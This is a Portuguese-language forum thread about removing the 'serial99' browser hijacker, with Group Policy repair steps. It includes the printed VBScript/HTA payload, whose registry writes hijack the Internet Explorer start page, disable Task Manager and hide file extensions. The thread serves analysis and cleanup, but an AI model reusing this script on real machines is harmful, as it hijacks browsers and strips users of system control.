Virus serial99

nmmr

Membro
Alguém que me ajude a eliminar um virus de nome serial99. Este virus por vezes quando abro uma nova webpage ele redireciona-me para a página serial99.com. Outra coisa que aconteceu de esquisito é que deixei de ter acesso ao gestor de tarefas. O meu antivirus (McAfee) não o consegue eliminar nem mesmo com o Adaware. Alguém que me possa ajudar por favor.
 
Eu também tinha esse vírus no meu internet explorer, até que me invoquei e resolvi tirá-lo, é simples, basta entrar em diretivas de grupo clicando em "executar" no menu iniciar e digitando "gpedit.msc" e dando ok. Já em diretivas de grupo vá em CONFIGURAÇÕES DE USUÁRIOS, depois em CONFIGURAÇÕES DO WINDOWS e MANUTENÇÃO DO INTERNET EXPLORER. Agora vá em URLS, depois em URLS IMPORTANTES, na janela que abrir marque PERSONALIZAR A URL DA HOME PAGE e, embaixo coloque a url de sua preferência. Clique em OK e feche o diretivas de grupo. Pronto, agora é só fazer o teste no internet explorer.:001:
O gestor de tarefas é reativado também em diretivas de grupo. Vá em CONFIGURAÇÕES DO USUÁRIO, depois em MODELOS ADMINISTRATIVOS, em SISTEMAS, depois em OPÇÕES DE CTRL+ALT+DEL e depois em REMOVER 'GERENCIADOR DE TAREFAS'. Marque DESATIVADO e clique em OK. Feche o diretivas de grupo. Agora faça o teste.;)
 
VBS? Arranjaste-o? Em caso afirmativo, manda-me o source por PM, sff :P

Isso quer dizer que este pseudo-vírus só "atacava" quando alguém abria o IE?
 
Angel, é só ires ao site que ele disse. Todos os files são iguais (go figure...). São sempre rar's autoexecutáveis em que o rar faz o setup ao vírus (criativo, muito criativo :) ). Se mudares a extensão para .xpto e fizeres "Abrir com..." e escolheres o WinRAR ele abre o ficheiro e mostra-te o .hta que está lá dentro e o setup script. Basta extrair o .hta e mudar para .txt, voila defused e pronto para análise.

p.s. passa aqui. Diz lá que não é lindo... Pra quê escrever exploits complicados quando se pode ownar a box apenas intrujando o user... :)
 
Última edição:
Nunca tinha ouvido falar em hta. Obrigado pelo link :)

Realmente, fiquei tão desiludido quanto tu... é que aquilo nem traz nada de especial, e ficou completamente "nu" e sem piada :(

O terceiro post já disse como remover esse "vírus" (que nome se dá a isto?)...
 
Hmmm... "Microsoft enabled malware for dumb users"? Se bem que a categoria de POS tambem sirva...

No entanto dá uma ideia de que a coisa pode realmente ser interressante (do ponto de vista sociologico...). Se a coisa seguir esse caminho e a PowerShell evoluir e se tornar algo trivial e widespread, não vais ter grandes razões para "escrever binários" quando um shell script faz o mesmo trabalho.

E para o Joe User não existe diferença entre um binário "aguerrido" e um shell scrip idêntico. Não sabem lidar com nenhum deles...
 
É seguro visitar o site?:D

Em caso de duvidas tens uma coisa chamada Off By One. Eu no FF não vi nada que sequer me fizesse pensar... Mas utilizadores de IE, bom nem pela alma se lhe reza de uma maneira ou de outra...

Qqr modo, aquilo não é vírus, é mais um scam. Entre os google ads e os banners e os homepage hijacks eles têm um batalhão de borregos a pagar-lhes as continhas...

E este não são a variedade que eu possa dizer "tadinhos dos users", é mais a variedade "têm o que pediram".
 
É seguro visitar o site?:D
Desde que não vás lá com o MSIE....
Eu foi com o Firefox e não tive problemas. De qualquer forma, penso que existem vulnerabilidades no Firefox que também ponham em risco os users, mas são bem mais raras.

E já agora remove-lo no modo de segurança do windows tb é algo útil...
O que é que essa coisa faz, no fundo (tkz, ShadeX :P):
Código:
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")

  shell.[B]regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","http://www.serial99.com/?","REG_SZ"

  [/B]shell.[B]regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"[/B]

  shell.[B]regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"[/B]

  shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.serial99.com/?a","REG_SZ"[/B]

  shell.[B]regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.serial99.com/?a","REG_SZ"[/B]

  shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"[/B]

  shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"[/B]
self.Close
</SCRIPT>

Dá para reverter as alterações feitas por isso pelo regedit. Nem precisam de arrancar pelo modo de segurança...

E este não são a variedade que eu possa dizer "tadinhos dos users", é mais a variedade "têm o que pediram".

Só por acaso, vá, para além de pharming, há alguma situação em que digas "tadinhos dos users"? :D

Para o dito "Joe User", eram os .js e .vbs que eram enviados nos mails há alguns anos atrás. Vá lá, nesse tempo eu ainda não tinha Internet, nunca tive problemas :P
Mas o Melissa ainda foi uma coisa que gostei de ver.
 
Só por acaso, vá, para além de pharming, há alguma situação em que digas "tadinhos dos users"? :D

Claro que há. O meu negro coração não é assim tão empedernido... :004:

Se me disserem que estavam a ver o site da Disney no Opera e apanharam um vírus/exploit "à séria" eu tenho pena. Mas se for o site da Ana Malhoa ja tiveram o que mereciam :D
 
Eu também tinha esse vírus no meu internet explorer, até que me invoquei e resolvi tirá-lo, é simples, basta entrar em diretivas de grupo clicando em "executar" no menu iniciar e digitando "gpedit.msc" e dando ok. Já em diretivas de grupo vá em CONFIGURAÇÕES DE USUÁRIOS, depois em CONFIGURAÇÕES DO WINDOWS e MANUTENÇÃO DO INTERNET EXPLORER. Agora vá em URLS, depois em URLS IMPORTANTES, na janela que abrir marque PERSONALIZAR A URL DA HOME PAGE e, embaixo coloque a url de sua preferência. Clique em OK e feche o diretivas de grupo. Pronto, agora é só fazer o teste no internet explorer.:001:
O gestor de tarefas é reativado também em diretivas de grupo. Vá em CONFIGURAÇÕES DO USUÁRIO, depois em MODELOS ADMINISTRATIVOS, em SISTEMAS, depois em OPÇÕES DE CTRL+ALT+DEL e depois em REMOVER 'GERENCIADOR DE TAREFAS'. Marque DESATIVADO e clique em OK. Feche o diretivas de grupo. Agora faça o teste.


o q é diretivas de grupo
 
Back
Topo